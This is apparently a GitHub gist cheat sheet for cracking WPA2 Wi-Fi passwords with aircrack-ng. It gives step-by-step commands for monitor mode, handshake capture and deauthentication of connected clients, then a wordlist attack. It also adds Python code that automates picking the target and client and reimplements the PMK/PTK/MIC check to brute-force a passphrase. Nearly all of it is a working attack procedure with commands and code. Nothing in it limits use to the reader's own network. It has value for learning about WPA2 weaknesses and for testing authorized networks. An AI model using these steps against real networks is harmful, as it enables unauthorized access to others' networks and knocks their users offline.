
@dnorhoj
Created September 28, 2022 07:21

Aircrack-ng cheat sheet

Installing

Install aircrack-ng from your package manager.

Ex: sudo apt install aircrack-ng

Enter monitor mode

First get your network card name with

ip link

Here mine is wlan0

sudo airmon-ng start wlan0

Confirm that a wlan0mon interface now shows up in ip link. Some drivers keep the name wlan0 and only switch its mode; in that case check with iw dev that the interface type is now "monitor".

If the interface did not go into monitor mode, a network manager (NetworkManager, wpa_supplicant, dhclient) is probably still holding it. Kill those processes with:

sudo airmon-ng check kill

And then try again. This takes down your normal network connection; when you are done, run sudo airmon-ng stop wlan0mon and start the manager again (on systemd distributions typically sudo systemctl start NetworkManager).

Get network channel and BSSID

Start your first scan with the following command:

sudo airodump-ng wlan0mon

Which will show something similar to this:

 CH 14 ][ Elapsed: 0 s ][ 2022-09-27 18:47

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 12:34:56:78:90:AB    0        3        0    0   6  130   WPA2 CCMP   PSK  WIFI NAVN

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 12:34:56:78:90:AB  DE:AD:F0:0D:12:34  -37    1e- 6e     0        4

The top table lists access points (BSSID, channel in the CH column, encryption, ESSID), the bottom one lists clients (STATION) and which BSSID they are associated with. We will refer back to this later!

Start listening for a handshake

We need to gather the following information in order to start listening for a handshake.

  1. Network BSSID (mac address)
  2. Network channel

Then plug those two values into the following command, which locks the card to that channel and writes everything it captures to a file:

sudo airodump-ng --bssid <bssid> -c <channel> -w <output_file> wlan0mon

We can get the data from the example, here the BSSID would be 12:34:56:78:90:AB and the channel (CH column) is 6. So the final command would be something like this:

sudo airodump-ng --bssid 12:34:56:78:90:AB -c 6 -w out wlan0mon

Leave this running. When a 4-way handshake has been captured, airodump-ng prints WPA handshake: 12:34:56:78:90:AB in the top right corner of the screen.

Until then, leave it in that window while we start deauthing the network.

Deauthing

With airodump-ng still running, open a second terminal and send deauthentication frames:

sudo aireplay-ng -0 2 -a <bssid> [-c <station>] wlan0mon

-0 2 sends two rounds of deauthentication frames and the interface name is required as the last argument. The -c <station> part is optional: targeting a specific client (a STATION associated with that BSSID in the scan) usually works better than the broadcast deauth you get without it, because the handshake only appears when a real client reconnects.

sudo aireplay-ng -0 2 -a 12:34:56:78:90:AB -c DE:AD:F0:0D:12:34 wlan0mon

Keep repeating this (and maybe physically move closer to the router) until you get a WPA handshake in the previous window. A few things that stop it from working: aireplay-ng must be on the same channel as the AP, which is why airodump-ng was started with -c (it will complain if the interface and the AP are on different channels); a network with no connected clients never produces a handshake, no matter how much you deauth; and clients using Protected Management Frames (802.11w, mandatory in WPA3) ignore spoofed deauthentication frames entirely.
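As an added example (this is not part of the gist or of aircrack-ng), the following Python helper does the "read the BSSID, channel and a client off the airodump-ng screen" step from the CSV file that airodump-ng writes next to the capture (out-01.csv when started with -w out), and prints the airodump-ng and aireplay-ng commands above with the values filled in. The CSV text below is constructed to match the scan shown earlier, not a real capture; the function names parse_airodump_csv and plan_attack are my own. It assumes the ESSID contains no comma, which the CSV format does not quote.

```python
import csv
import io

# CONSTRUCTED sample in the layout airodump-ng uses for out-01.csv: an access-point
# section and a station section, each with its own header line. Values mirror the scan
# in the cheat sheet plus one extra network and one unassociated client.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
12:34:56:78:90:AB, 2022-09-27 18:47:00, 2022-09-27 18:47:05,  6, 130, WPA2, CCMP, PSK, -40,        3,        0,   0.  0.  0.  0,   9, WIFI NAVN, 
AA:BB:CC:DD:EE:FF, 2022-09-27 18:47:00, 2022-09-27 18:47:05, 11,  54, WPA2, CCMP, PSK, -71,        2,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:F0:0D:12:34, 2022-09-27 18:47:00, 2022-09-27 18:47:05, -37,        4, 12:34:56:78:90:AB,
0A:0B:0C:0D:0E:0F, 2022-09-27 18:47:00, 2022-09-27 18:47:05, -80,        1, (not associated), Guest
"""


def parse_airodump_csv(text):
    """Split an airodump-ng CSV into a list of access points and a list of stations."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not any(cell.strip() for cell in row):
            continue  # blank separator lines between the two sections
        row = [cell.strip() for cell in row]
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap":
            aps.append({"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                        "power": int(row[8]), "essid": row[13]})
        elif section == "sta":
            # Column 5 is the BSSID the client is associated with, or "(not associated)".
            stations.append({"mac": row[0], "power": int(row[3]), "bssid": row[5]})
    return aps, stations


def plan_attack(aps, stations, essid, iface="wlan0mon", out="out"):
    """Return the capture command, the deauth command and the clients seen on the target."""
    target = next((ap for ap in aps if ap["essid"] == essid), None)
    if target is None:
        raise LookupError(f"ESSID {essid!r} not seen in the scan")
    # Strongest signal first (power is negative dBm, so -37 beats -80).
    clients = sorted((s for s in stations if s["bssid"] == target["bssid"]),
                     key=lambda s: -s["power"])
    capture = (f"sudo airodump-ng --bssid {target['bssid']} -c {target['channel']} "
               f"-w {out} {iface}")
    deauth = f"sudo aireplay-ng -0 2 -a {target['bssid']}"
    if clients:
        deauth += f" -c {clients[0]['mac']}"  # targeted deauth beats broadcast
    deauth += f" {iface}"
    return capture, deauth, clients


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    capture, deauth, clients = plan_attack(aps, stations, "WIFI NAVN")
    print(capture)
    print(deauth)
    print("clients:", [c["mac"] for c in clients])
```

Run it against a real file with parse_airodump_csv(open("out-01.csv").read()); if no client is listed for the target, the deauth line comes out without -c and you should expect to wait for someone to connect.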

Cracking

Once you have the handshake, we just have to get cracking.

Find a wordlist (such as rockyou.txt) and then execute the following command:

aircrack-ng -w <wordlist> <output_file>-01.cap

Where <output_file> is the prefix you gave to -w in Start listening for a handshake; airodump-ng appends -01 to it (and -02, -03, ... if you start it again with the same prefix). If the capture contains more than one network, add -b <bssid> to tell aircrack-ng which one to crack.

Give this some time. If the passphrase is in the wordlist, aircrack-ng will find it and show a screen like this:

                           Aircrack-ng 1.7

  [00:00:00] 891019/10303727 keys tested (2175.29 k/s)

  Time left: 1 hour, 18 minutes, 56 seconds                  0.00%

                       KEY FOUND! [ 13370420 ]


  Master Key     : DF 10 44 52 7C 59 22 F3 67 DC 83 0D CF 92 05 AE
                   23 81 70 A1 96 1C 4E F7 98 2A D2 F5 50 1D E9 CE

  Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Here the WiFi password is 13370420. The Master Key shown is the PMK derived from that passphrase and the ESSID; the rate of a few thousand keys per second is set by the 4096 PBKDF2 iterations that derivation costs per candidate, which is why long random passphrases are out of reach for a wordlist attack.
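What aircrack-ng computes for every wordlist entry, as an added example in Python (this is not aircrack-ng's code): derive the PMK from the candidate passphrase and ESSID with PBKDF2-HMAC-SHA1, expand it to the PTK using the two MAC addresses and the two nonces from the handshake, and check whether the first 16 bytes (the KCK) reproduce the MIC on EAPOL message 2. A candidate is the passphrase exactly when the MIC matches. The handshake material here is constructed by build_sample_handshake rather than read from a .cap file; it reuses the MAC addresses from the scan above and the passphrase from the screen above, and the nonces are made up. The function names are my own.

```python
import hashlib
import hmac
import struct

# EAPOL-Key layout: EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8), then the 16-byte MIC.
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    # The 4096 iterations are the expensive step behind aircrack-ng's keys/s figure.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated.
    blocks = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                      for i in range(4))
    return blocks[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # The MIC covers the whole EAPOL-Key frame with the MIC field itself zeroed.
    key_info = struct.unpack(">H", eapol[5:7])[0]
    version = key_info & 0x7  # key descriptor version: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1-128 (CCMP)
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"unsupported key descriptor version {version}")


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """Return the passphrase from wordlist that reproduces the captured MIC, or None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


def build_sample_handshake(passphrase: str, ssid: str = "WIFI NAVN"):
    # CONSTRUCTED handshake (no real capture): MACs from the cheat sheet's scan, fixed nonces,
    # and a minimal EAPOL-Key message 2 (RSN descriptor, Pairwise|MIC, version 2) whose MIC
    # is computed with the real passphrase so that crack() has something to verify against.
    ap_mac = bytes.fromhex("1234567890AB")
    sta_mac = bytes.fromhex("DEADF00D1234")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    key_info = 0x010A
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 0, 1) + snonce
            + b"\x00" * (16 + 8 + 8) + b"\x00" * MIC_LEN + struct.pack(">H", 0))
    eapol = bytes([1, 3]) + struct.pack(">H", len(body)) + body  # EAPOL v1, type EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return ssid, ap_mac, sta_mac, anonce, snonce, eapol


if __name__ == "__main__":
    handshake = build_sample_handshake("13370420")
    wordlist = ["password", "hunter2", "13370420", "letmein"]  # constructed stand-in for rockyou.txt
    print("KEY FOUND!", crack(wordlist, *handshake))
```

To use this against a real capture you would replace build_sample_handshake with code that pulls the two MACs, ANonce (message 1), SNonce and the full EAPOL frame of message 2 out of the .cap file; the derivation and the MIC check stay exactly as written. Only message 2 is needed for the check, which is why aircrack-ng can work from an incomplete 4-way handshake as long as messages 1 and 2 are present.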
